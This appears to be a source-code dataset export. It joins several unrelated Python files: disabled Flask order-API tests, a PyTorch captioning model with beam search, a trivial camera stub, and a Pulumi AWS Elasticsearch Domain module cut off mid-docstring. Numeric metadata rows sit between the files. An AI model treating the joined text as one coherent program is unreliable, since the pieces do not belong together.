{'date': '2021-01-18T13:24:07', 'id': 4, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
{'date': '2021-01-18T13:25:51', 'id': 5, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
{'date': '2021-01-18T13:26:13', 'id': 6, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
{'date': '2021-01-18T13:27:07', 'id': 7, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
{'date': '2021-01-18T13:27:40', 'id': 8, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
{'date': '2021-01-18T13:31:16', 'id': 9, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
{'date': '2021-01-18T13:38:14', 'id': 10, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0}
]}
assert response.status_code == 200 """
def test_Order_GET_ID_request(app):
"""with app.test_client() as client:
response = client.get('/orders/2')
data = json.loads(response.data.decode())
assert data == {'data':
{'date': '2021-01-18T13:19:43', 'id': 2, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
}
assert response.status_code == 200 """
def test_Order_POST_request(app):
""" with app.test_client() as client:
response = client.post(
'/orders',
data=json.dumps(dict(
status='Pedido em andamento',
payment_method='dinheiro',
products=[],
total_price=5.75
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
assert response.status_code == 201
assert 'Successfully created' in data.get("message")"""
def test_Order_PUT_request(app):
"""with app.test_client() as client:
response = client.put(
'/orders/3',
data=json.dumps(dict(
status='Pedido Concluído',
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
assert response.status_code == 200
assert data == {'data':
{'date': '2021-01-18T13:23:40', 'id': 3, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido Concluído', 'total_price': 0.0}
} """
def test_Order_DELETE_request(app):
"""with app.test_client() as client:
response = client.delete('/orders/11')
data = json.loads(response.data.decode())
assert response.status_code == 200
assert 'ok' in data.get("message") """
| 42.144578
| 153
| 0.563179
| 416
| 3,498
| 4.610577
| 0.185096
| 0.081335
| 0.131387
| 0.181439
| 0.849322
| 0.849322
| 0.819082
| 0.814911
| 0.807091
| 0.807091
| 0
| 0.079666
| 0.246427
| 3,498
| 82
| 154
| 42.658537
| 0.647951
| 0.809034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.714286
| false
| 0
| 0.285714
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
f4f1e78a08c98eb8d3771e934a33ab6badf235b9
| 14,472
|
py
|
Python
|
models/CaptioningModel.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 32
|
2021-03-01T07:02:52.000Z
|
2022-03-30T02:38:35.000Z
|
models/CaptioningModel.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 6
|
2021-04-14T12:20:16.000Z
|
2022-03-11T11:21:36.000Z
|
models/CaptioningModel.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 3
|
2021-08-17T13:18:08.000Z
|
2022-02-10T08:15:28.000Z
|
import torch
from torch import nn
from torch import distributions
import functools
import operator
class CaptioningModel(nn.Module):
def __init__(self, seq_len):
self.seq_len = seq_len
super(CaptioningModel, self).__init__()
def init_weights(self):
raise NotImplementedError
def init_state(self, b_s, device):
raise NotImplementedError
def step(self, t, state, prev_outputs, images, seqs, *args, mode='teacher_forcing'):
raise NotImplementedError
def forward(self, statics, seqs, *args):
device = statics[0].device
b_s = statics[0].size(0)
seq_len = seqs[0].size(1)
state = self.init_state(b_s, device)
outs = None
outputs = []
for t in range(seq_len):
outs, state = self.step(t, state, outs, statics, seqs, *args, mode='teacher_forcing')
outputs.append(outs)
outputs = list(zip(*outputs))
outputs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in outputs)
return outputs
def test(self, statics, *args):
device = statics[0].device
b_s = statics[0].size(0)
state = self.init_state(b_s, device)
outs = None
outputs = []
for t in range(self.seq_len):
outs, state = self.step(t, state, outs, statics, None, *args, mode='feedback')
outs = tuple(torch.max(o, -1)[1] for o in outs)
outputs.append(outs)
outputs = list(zip(*outputs))
outputs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in outputs)
return outputs
def sample_rl(self, statics, *args):
device = statics[0].device
b_s = statics[0].size(0)
state = self.init_state(b_s, device)
outputs = []
log_probs = []
for t in range(self.seq_len):
prev_outputs = outputs[-1] if t > 0 else None
outs, state = self.step(t, state, prev_outputs, statics, None, *args, mode='feedback')
outputs.append([])
log_probs.append([])
for out in outs:
distr = distributions.Categorical(logits=out)
sample = distr.sample()
outputs[-1].append(sample)
log_probs[-1].append(distr.log_prob(sample))
outputs = list(zip(*outputs))
outputs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in outputs)
log_probs = list(zip(*log_probs))
log_probs = tuple(torch.cat([oo.unsqueeze(1) for oo in o], 1) for o in log_probs)
return outputs, log_probs
def _select_beam(self, input, selected_beam, cur_beam_size, beam_size, b_s, reduced=True):
if not isinstance(input, list) and not isinstance(input, tuple):
return self._select_beam_i(input, selected_beam, cur_beam_size, beam_size, b_s, reduced=reduced)
new_input = []
for i, s in enumerate(input):
if isinstance(s, tuple) or isinstance(s, list):
new_state_i = []
for ii, ss in enumerate(s):
new_state_ii = self._select_beam_i(ss, selected_beam, cur_beam_size, beam_size, b_s,
reduced=reduced)
new_state_i.append(new_state_ii)
new_input.append(tuple(new_state_i))
else:
new_state_i = self._select_beam_i(s, selected_beam, cur_beam_size, beam_size, b_s, reduced=reduced)
new_input.append(new_state_i)
return list(new_input)
def _select_beam_i(self, input, selected_beam, cur_beam_size, beam_size, b_s, reduced=True):
input_shape = input.shape
if reduced:
input_shape = input_shape[1:]
else:
input_shape = input_shape[2:]
input_exp_shape = (b_s, cur_beam_size) + input_shape
output_exp_shape = (b_s, beam_size) + input_shape
input_red_shape = (b_s * beam_size,) + input_shape
selected_beam_red_size = (b_s, beam_size) + tuple(1 for _ in range(len(input_exp_shape) - 2))
selected_beam_exp_size = (b_s, beam_size) + input_exp_shape[2:]
input_exp = input.view(input_exp_shape)
selected_beam_exp = selected_beam.view(selected_beam_red_size).expand(selected_beam_exp_size).long()
out = torch.gather(input_exp, 1, selected_beam_exp)
if reduced:
out = out.view(input_red_shape)
else:
out = out.view(output_exp_shape)
return out
def beam_search(self, statics, eos_idxs, beam_size, out_size=1, *args):
device = statics[0].device
b_s = statics[0].size(0)
state = self.init_state(b_s, device)
outputs = []
log_probs = []
selected_outs = None
for t in range(self.seq_len):
# import pdb;pdb.set_trace()
outs_logprob, state = self.step(t, state, selected_outs, statics, None, *args, mode='feedback')
if t == 0:
n_outs = len(outs_logprob)
cur_beam_size = 1
seq_logprob = statics[0].data.new_zeros([b_s, 1] + [1]*n_outs)
seq_masks = [statics[0].data.new_ones((b_s, beam_size))] * n_outs
else:
cur_beam_size = beam_size
old_seq_logprob = seq_logprob
outs_logprob = [ol.view([b_s, cur_beam_size] + [1]*i + [-1] + [1]*(n_outs-i-1)) for i, ol in enumerate(outs_logprob)]
seq_logprob = seq_logprob + functools.reduce(operator.add, outs_logprob)
# Mask sequence if it reaches EOS
if t > 0:
masks = [(so.view(b_s, cur_beam_size) != idx).float() for idx, so in zip(eos_idxs, selected_outs)]
seq_masks = [sm * m for (sm, m) in zip(seq_masks, masks)]
outs_logprob = [ol.squeeze() * sm.unsqueeze(-1) for (ol, sm) in zip(outs_logprob, seq_masks)]
old_seq_logprob = old_seq_logprob.expand_as(seq_logprob).contiguous()
old_seq_logprob[:, :, 1:] = -999
seq_mask_full = torch.clamp(torch.sum(torch.cat([sm.unsqueeze(0) for sm in seq_masks]), 0), 0, 1)
seq_mask_full = seq_mask_full.view(list(seq_mask_full.shape) + [1] * n_outs)
seq_logprob = seq_mask_full*seq_logprob + old_seq_logprob*(1-seq_mask_full)
selected_logprob, selected_idx = torch.sort(seq_logprob.view(b_s, -1), -1, descending=True)
selected_logprob, selected_idx = selected_logprob[:, :beam_size], selected_idx[:, :beam_size]
_div = functools.reduce(operator.mul, seq_logprob.shape[2:], 1)
selected_beam = selected_idx // _div
selected_outs = []
for i in range(n_outs):
if i == 0:
selected_idx = selected_idx - selected_beam * _div
else:
selected_idx = selected_idx - selected_outs[-1] * _div
_div = functools.reduce(operator.mul, seq_logprob.shape[3+i:], 1)
selected_outs.append((selected_idx / _div).long())
# Update states, statics and seq_mask
state = self._select_beam(state, selected_beam, cur_beam_size, beam_size, b_s)
statics = self._select_beam(statics, selected_beam, cur_beam_size, beam_size, b_s)
seq_masks = self._select_beam(seq_masks, selected_beam, beam_size, beam_size, b_s, reduced=False)
outputs = self._select_beam(outputs, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
outputs.append([so.unsqueeze(-1) for so in selected_outs])
seq_logprob = selected_logprob.view([b_s, beam_size] + [1]*n_outs)
outs_logprob = [ol.view(b_s, cur_beam_size, -1) for ol in outs_logprob]
this_word_logprob = self._select_beam(outs_logprob, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
this_word_logprob = [torch.gather(o, 2, selected_outs[i].unsqueeze(-1)) for i, o in enumerate(this_word_logprob)]
log_probs.append(this_word_logprob)
selected_outs = [so.view(-1) for so in selected_outs]
# Sort result
# import pdb;pdb.set_trace()
seq_logprob, sort_idxs = torch.sort(seq_logprob.view(b_s, beam_size, 1), 1, descending=True)
outputs = list(zip(*outputs))
outputs = [torch.cat(o, -1) for o in outputs]
outputs = [torch.gather(o, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for o in outputs]
log_probs = list(zip(*log_probs))
log_probs = [torch.cat(lp, -1) for lp in log_probs]
log_probs = [torch.gather(lp, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for lp in log_probs]
outputs = [o.contiguous()[:, :out_size] for o in outputs]
log_probs = [lp.contiguous()[:, :out_size] for lp in log_probs]
if out_size == 1:
outputs = [o.squeeze(1) for o in outputs]
log_probs = [lp.squeeze(1) for lp in log_probs]
return outputs, log_probs
def beam_search_v(self, statics, eos_idxs, beam_size, out_size=1, *args, gt=False):
device = statics[0].device
b_s = statics[0].size(0)
state = self.init_state(b_s, device)
outputs = []
log_probs = []
selected_outs = None
for t in range(self.seq_len):
# outs_logprob: (out, gate_weights),
# state: (state_1, state_2, ctrl_det_idxs)
# outs_logprob, state = self.step_v(t, state, selected_outs, statics, None, *args, mode='feedback')
outs_logprob, state = self.step_v(t, state, selected_outs, statics, None, *args, mode='feedback', gt=gt)
if t == 0:
n_outs = len(outs_logprob) # 2
cur_beam_size = 1
seq_logprob = statics[0].data.new_zeros([b_s, 1] + [1]*n_outs) # (b_s, 1, 1, 1)
seq_masks = [statics[0].data.new_ones((b_s, beam_size))] * n_outs # [(b_s, bm_s), (b_s, bm_s)]
else:
cur_beam_size = beam_size
old_seq_logprob = seq_logprob
# out: (b_s, cur_b_s, -1, 1), gate_weights: (b_s, cur_b_s, 1, -1)
outs_logprob = [ol.view([b_s, cur_beam_size] + [1]*i + [-1] + [1]*(n_outs-i-1)) for i, ol in enumerate(outs_logprob)]
# seq_logprob: (b_s, cur_b_s, v_s, 2)
seq_logprob = seq_logprob + functools.reduce(operator.add, outs_logprob)
# Mask sequence if it reaches EOS
if t > 0:
masks = [(so.view(b_s, cur_beam_size) != idx).float() for idx, so in zip(eos_idxs, selected_outs)]
seq_masks = [sm * m for (sm, m) in zip(seq_masks, masks)]
outs_logprob = [ol.squeeze() * sm.unsqueeze(-1) for (ol, sm) in zip(outs_logprob, seq_masks)]
old_seq_logprob = old_seq_logprob.expand_as(seq_logprob).contiguous()
old_seq_logprob[:, :, 1:] = -999
seq_mask_full = torch.clamp(torch.sum(torch.cat([sm.unsqueeze(0) for sm in seq_masks]), 0), 0, 1)
seq_mask_full = seq_mask_full.view(list(seq_mask_full.shape) + [1] * n_outs)
seq_logprob = seq_mask_full*seq_logprob + old_seq_logprob*(1-seq_mask_full)
# (b_s, v_s * 2)排序,保留前bm_s个(b_s, bm_s)
selected_logprob, selected_idx = torch.sort(seq_logprob.view(b_s, -1), -1, descending=True)
selected_logprob, selected_idx = selected_logprob[:, :beam_size], selected_idx[:, :beam_size]
# _div = v_s * 2
_div = functools.reduce(operator.mul, seq_logprob.shape[2:], 1)
# selected_beam: (b_s, bm_s), 表明选择0还是1
selected_beam = selected_idx // _div
selected_outs = []
for i in range(n_outs):
if i == 0:
# 表示选择的是哪个word(除以2之后)
selected_idx = selected_idx - selected_beam * _div
else:
# _div = 2
selected_idx = selected_idx - selected_outs[-1] * _div
# _div = 2
_div = functools.reduce(operator.mul, seq_logprob.shape[3+i:], 1)
selected_outs.append((selected_idx / _div).long())
# (b_s, bm_s) 前一个表示选择了哪个word,后一个表示选择gate
# Update states, statics and seq_mask
state = self._select_beam(state, selected_beam, cur_beam_size, beam_size, b_s)
statics = self._select_beam(statics, selected_beam, cur_beam_size, beam_size, b_s)
seq_masks = self._select_beam(seq_masks, selected_beam, beam_size, beam_size, b_s, reduced=False)
outputs = self._select_beam(outputs, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
outputs.append([so.unsqueeze(-1) for so in selected_outs])
# (b_s, bm_s, 1, 1)
seq_logprob = selected_logprob.view([b_s, beam_size] + [1]*n_outs)
# out: (b_s, cur_b_s, v_s), gate_weights: (b_s, cur_b_s, 2)
outs_logprob = [ol.view(b_s, cur_beam_size, -1) for ol in outs_logprob]
# out: (b_s, bm_s, v_s), gate_weights: (b_s, bm_s, 2)
this_word_logprob = self._select_beam(outs_logprob, selected_beam, cur_beam_size, beam_size, b_s, reduced=False)
this_word_logprob = [torch.gather(o, 2, selected_outs[i].unsqueeze(-1)) for i, o in enumerate(this_word_logprob)]
log_probs.append(this_word_logprob)
# (b_s * bm_s)
selected_outs = [so.view(-1) for so in selected_outs]
# Sort result
# seq_logprob: (b_s, bm_s, 1)
seq_logprob, sort_idxs = torch.sort(seq_logprob.view(b_s, beam_size, 1), 1, descending=True)
# 把vob_idx和gate_idx分开,然后连接起来
outputs = list(zip(*outputs))
outputs = [torch.cat(o, -1) for o in outputs]
outputs = [torch.gather(o, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for o in outputs]
log_probs = list(zip(*log_probs))
log_probs = [torch.cat(lp, -1) for lp in log_probs]
log_probs = [torch.gather(lp, 1, sort_idxs.expand(b_s, beam_size, self.seq_len)) for lp in log_probs]
outputs = [o.contiguous()[:, :out_size] for o in outputs]
log_probs = [lp.contiguous()[:, :out_size] for lp in log_probs]
if out_size == 1:
outputs = [o.squeeze(1) for o in outputs]
log_probs = [lp.squeeze(1) for lp in log_probs]
return outputs, log_probs
| 49.057627
| 129
| 0.600746
| 2,077
| 14,472
| 3.892634
| 0.073664
| 0.018058
| 0.032653
| 0.033643
| 0.811998
| 0.783673
| 0.780087
| 0.758318
| 0.737168
| 0.721583
| 0
| 0.014677
| 0.284411
| 14,472
| 294
| 130
| 49.22449
| 0.766029
| 0.061774
| 0
| 0.715556
| 0
| 0
| 0.004576
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048889
| false
| 0
| 0.022222
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52094fb4fa09a56d3d50c001eb8cb81eeae0d6c5
| 32
|
py
|
Python
|
api/app/cameraClient.py
|
fairglen/gandalf
|
97daa12dcf3b476207126765da960662cf51f214
|
[
"Apache-2.0"
] | 1
|
2020-03-27T17:13:21.000Z
|
2020-03-27T17:13:21.000Z
|
api/app/cameraClient.py
|
fairglen/gandalf
|
97daa12dcf3b476207126765da960662cf51f214
|
[
"Apache-2.0"
] | 7
|
2020-06-05T20:05:32.000Z
|
2022-03-12T00:12:08.000Z
|
api/app/cameraClient.py
|
fairglen/gandalf
|
97daa12dcf3b476207126765da960662cf51f214
|
[
"Apache-2.0"
] | null | null | null |
def capture():
return "poop"
| 16
| 17
| 0.625
| 4
| 32
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21875
| 32
| 2
| 17
| 16
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
52510f789a5602898c43250be8c32254b024978e
| 31,158
|
py
|
Python
|
sdk/python/pulumi_aws/elasticsearch/domain.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/elasticsearch/domain.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/elasticsearch/domain.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Domain(pulumi.CustomResource):
access_policies: pulumi.Output[str]
"""
IAM policy document specifying the access policies for the domain
"""
advanced_options: pulumi.Output[dict]
"""
Key-value string pairs to specify advanced configuration options.
Note that the values for these configuration options must be strings (wrapped in quotes) or they
may be wrong and cause a perpetual diff, causing this provider to want to recreate your Elasticsearch
domain on every apply.
"""
arn: pulumi.Output[str]
"""
Amazon Resource Name (ARN) of the domain.
"""
cluster_config: pulumi.Output[dict]
"""
Cluster configuration of the domain, see below.
* `dedicatedMasterCount` (`float`) - Number of dedicated master nodes in the cluster
* `dedicatedMasterEnabled` (`bool`) - Indicates whether dedicated master nodes are enabled for the cluster.
* `dedicatedMasterType` (`str`) - Instance type of the dedicated master nodes in the cluster.
* `instance_count` (`float`) - Number of instances in the cluster.
* `instance_type` (`str`) - Instance type of data nodes in the cluster.
* `warmCount` (`float`) - The number of warm nodes in the cluster. Valid values are between `2` and `150`. `warm_count` can be only and must be set when `warm_enabled` is set to `true`.
* `warmEnabled` (`bool`) - Indicates whether to enable warm storage.
* `warmType` (`str`) - The instance type for the Elasticsearch cluster's warm nodes. Valid values are `ultrawarm1.medium.elasticsearch`, `ultrawarm1.large.elasticsearch` and `ultrawarm1.xlarge.elasticsearch`. `warm_type` can be only and must be set when `warm_enabled` is set to `true`.
* `zoneAwarenessConfig` (`dict`) - Configuration block containing zone awareness settings. Documented below.
* `availabilityZoneCount` (`float`) - Number of Availability Zones for the domain to use with `zone_awareness_enabled`. Defaults to `2`. Valid values: `2` or `3`.
* `zoneAwarenessEnabled` (`bool`) - Indicates whether zone awareness is enabled, set to `true` for multi-az deployment. To enable awareness with three Availability Zones, the `availability_zone_count` within the `zone_awareness_config` must be set to `3`.
"""
cognito_options: pulumi.Output[dict]
domain_endpoint_options: pulumi.Output[dict]
"""
Domain endpoint HTTP(S) related options. See below.
* `enforceHttps` (`bool`) - Whether or not to require HTTPS
* `tlsSecurityPolicy` (`str`) - The name of the TLS security policy that needs to be applied to the HTTPS endpoint. Valid values: `Policy-Min-TLS-1-0-2019-07` and `Policy-Min-TLS-1-2-2019-07`. This provider will only perform drift detection if a configuration value is provided.
"""
domain_id: pulumi.Output[str]
"""
Unique identifier for the domain.
"""
domain_name: pulumi.Output[str]
"""
Name of the domain.
"""
ebs_options: pulumi.Output[dict]
"""
EBS related options, may be required based on chosen [instance size](https://aws.amazon.com/elasticsearch-service/pricing/). See below.
* `ebsEnabled` (`bool`) - Whether EBS volumes are attached to data nodes in the domain.
* `iops` (`float`) - The baseline input/output (I/O) performance of EBS volumes
attached to data nodes. Applicable only for the Provisioned IOPS EBS volume type.
* `volume_size` (`float`) - The size of EBS volumes attached to data nodes (in GB).
**Required** if `ebs_enabled` is set to `true`.
* `volumeType` (`str`) - The type of EBS volumes attached to data nodes.
"""
elasticsearch_version: pulumi.Output[str]
"""
The version of Elasticsearch to deploy. Defaults to `1.5`
"""
encrypt_at_rest: pulumi.Output[dict]
"""
Encrypt at rest options. Only available for [certain instance types](http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-instance-types.html). See below.
* `enabled` (`bool`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `kms_key_id` (`str`) - The KMS key id to encrypt the Elasticsearch domain with. If not specified then it defaults to using the `aws/es` service KMS key.
"""
endpoint: pulumi.Output[str]
"""
Domain-specific endpoint used to submit index, search, and data upload requests.
"""
kibana_endpoint: pulumi.Output[str]
"""
Domain-specific endpoint for kibana without https scheme.
* `vpc_options.0.availability_zones` - If the domain was created inside a VPC, the names of the availability zones the configured `subnet_ids` were created inside.
* `vpc_options.0.vpc_id` - If the domain was created inside a VPC, the ID of the VPC.
"""
log_publishing_options: pulumi.Output[list]
"""
Options for publishing slow logs to CloudWatch Logs.
* `cloudwatch_log_group_arn` (`str`) - ARN of the Cloudwatch log group to which log needs to be published.
* `enabled` (`bool`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
* `logType` (`str`) - A type of Elasticsearch log. Valid values: INDEX_SLOW_LOGS, SEARCH_SLOW_LOGS, ES_APPLICATION_LOGS
"""
node_to_node_encryption: pulumi.Output[dict]
"""
Node-to-node encryption options. See below.
* `enabled` (`bool`) - Specifies whether Amazon Cognito authentication with Kibana is enabled or not
"""
snapshot_options: pulumi.Output[dict]
"""
Snapshot related options, see below.
* `automatedSnapshotStartHour` (`float`) - Hour during which the service takes an automated daily
snapshot of the indices in the domain.
"""
tags: pulumi.Output[dict]
"""
A map of tags to assign to the resource
"""
vpc_options: pulumi.Output[dict]
"""
VPC related options, see below. Adding or removing this configuration forces a new resource ([documentation](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-vpc-limitations)).
* `availability_zones` (`list`)
* `security_group_ids` (`list`) - List of VPC Security Group IDs to be applied to the Elasticsearch domain endpoints. If omitted, the default Security Group for the VPC will be used.
* `subnet_ids` (`list`) - List of VPC Subnet IDs for the Elasticsearch domain endpoints to be created in.
* `vpc_id` (`str`)
"""
def __init__(__self__, resource_name, opts=None, access_policies=None, advanced_options=None, cluster_config=None, cognito_options=None, domain_endpoint_options=None, domain_name=None, ebs_options=None, elasticsearch_version=None, encrypt_at_rest=None, log_publishing_options=None, node_to_node_encryption=None, snapshot_options=None, tags=None, vpc_options=None, __props__=None, __name__=None, __opts__=None):
"""
Manages an AWS Elasticsearch Domain.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.elasticsearch.Domain("example",
cluster_config={
"cluster_config": "r4.large.elasticsearch",
},
elasticsearch_version="1.5",
snapshot_options={
"snapshot_options": 23,
},
tags={
"Domain": "TestDomain",
})
```
### Access Policy
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
domain = config.get("domain")
if domain is None:
domain = "tf-test"
current_region = aws.get_region()
current_caller_identity = aws.get_caller_identity()
example = aws.elasticsearch.Domain("example", access_policies=f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "es:*",
"Principal": "*",
"Effect": "Allow",
"Resource": "arn:aws:es:{current_region.name}:{current_caller_identity.account_id}:domain/{domain}/*",
"Condition": {{
"IpAddress": {{"aws:SourceIp": ["66.193.100.22/32"]}}
}}
}}
]
}}
\"\"\")
```
### Log Publishing to CloudWatch Logs
```python
import pulumi
import pulumi_aws as aws
example_log_group = aws.cloudwatch.LogGroup("exampleLogGroup")
example_log_resource_policy = aws.cloudwatch.LogResourcePolicy("exampleLogResourcePolicy",
policy_document=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "es.amazonaws.com"
},
"Action": [
"logs:PutLogEvents",
"logs:PutLogEventsBatch",
"logs:CreateLogStream"
],
"Resource": "arn:aws:logs:*"
}
]
}
\"\"\",
policy_name="example")
example_domain = aws.elasticsearch.Domain("exampleDomain", log_publishing_options=[{
"cloudwatch_log_group_arn": example_log_group.arn,
"logType": "INDEX_SLOW_LOGS",
}])
```
### VPC based ES
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
vpc = config.require_object("vpc")
domain = config.get("domain")
if domain is None:
domain = "tf-test"
selected_vpc = aws.ec2.get_vpc(tags={
"Name": vpc,
})
selected_subnet_ids = aws.ec2.get_subnet_ids(tags={
"Tier": "private",
},
vpc_id=selected_vpc.id)
current_region = aws.get_region()
current_caller_identity = aws.get_caller_identity()
es_security_group = aws.ec2.SecurityGroup("esSecurityGroup",
description="Managed by Pulumi",
ingress=[{
"cidr_blocks": [selected_vpc.cidr_block],
"from_port": 443,
"protocol": "tcp",
"to_port": 443,
}],
vpc_id=selected_vpc.id)
es_service_linked_role = aws.iam.ServiceLinkedRole("esServiceLinkedRole", aws_service_name="es.amazonaws.com")
es_domain = aws.elasticsearch.Domain("esDomain",
access_policies=f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "es:*",
"Principal": "*",
"Effect": "Allow",
"Resource": "arn:aws:es:{current_region.name}:{current_caller_identity.account_id}:domain/{domain}/*"
}}
]
}}
\"\"\",
advanced_options={
"rest.action.multi.allow_explicit_index": "true",
},
cluster_config={
"cluster_config": "m4.large.elasticsearch",
},
elasticsearch_version="6.3",
snapshot_options={
"snapshot_options": 23,
},
tags={
"Domain": "TestDomain",
},
vpc_options={
"security_group_ids": [es_security_group.id],
"subnet_ids": [
selected_subnet_ids.ids[0],
selected_subnet_ids.ids[1],
],
})
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] access_policies: IAM policy document specifying the access policies for the domain
:param pulumi.Input[dict] advanced_options: Key-value string pairs to specify advanced configuration options.
Note that the values for these configuration options must be strings (wrapped in quotes) or they
may be wrong and cause a perpetual diff, causing this provider to want to recreate your Elasticsearch
domain on every apply.
:param pulumi.Input[dict] cluster_config: Cluster configuration of the domain, see below.
:param pulumi.Input[dict] domain_endpoint_options: Domain endpoint HTTP(S) related options. See below.
:param pulumi.Input[str] domain_name: Name of the domain.
:param pulumi.Input[dict] ebs_options: EBS related options, may be required based on chosen [instance size](https://aws.amazon.com/elasticsearch-service/pricing/). See below.
:param pulumi.Input[str] elasticsearch_version: The version of Elasticsearch to deploy. Defaults to `1.5`
:param pulumi.Input[dict] encrypt_at_rest: Encrypt at rest options. Only available for [certain instance types](http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-instance-types.html). See below.
:param pulumi.Input[list] log_publishing_options: Options for publishing slow logs to CloudWatch Logs.
:param pulumi.Input[dict] node_to_node_encryption: Node-to-node encryption options. See below.
:param pulumi.Input[dict] snapshot_options: Snapshot related options, see below.
:param pulumi.Input[dict] tags: A map of tags to assign to the resource
:param pulumi.Input[dict] vpc_options: VPC related options, see below. Adding or removing this configuration forces a new resource ([documentation](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-vpc-limitations)).
The **cluster_config** object supports the following:
* `dedicatedMasterCount` (`pulumi.Input[float]`) - Number of dedicated master nodes in the cluster
* `dedicatedMasterEnabled` (`pulumi.Input[bool]`) - Indicates whether dedicated master nodes are enabled for the cluster.
* `dedicatedMasterType` (`pulumi.Input[str]`) - Instance type of the dedicated master nodes in the cluster.
* `instance_count` (`pulumi.Input[float]`) - Number of instances in the cluster.
* `instance_type` (`pulumi.Input[str]`) - Instance type of data nodes in the cluster.
* `warmCount` (`pulumi.Input[float]`) - The number of warm nodes in the cluster. Valid values are between `2` and `150`. `warm_count` can be only and must be set when `warm_enabled` is set to `true`.
* `warmEnabled` (`pulumi.Input[bool]`) - Indicates whether to enable warm storage.
* `warmType` (`pulumi.Input[str]`) - The instance type for the Elasticsearch cluster's warm nodes. Valid values are `ultrawarm1.medium.elasticsearch`, `ultrawarm1.large.elasticsearch` and `ultrawarm1.xlarge.elasticsearch`. `warm_type` can be only and must be set when `warm_enabled` is set to `true`.
* `zoneAwarenessConfig` (`pulumi.Input[dict]`) - Configuration block containing zone awareness settings. Documented below.
* `availabilityZoneCount` (`pulumi.Input[float]`) - Number of Availability Zones for the domain to use with `zone_awareness_enabled`. Defaults to `2`. Valid values: `2` or `3`.
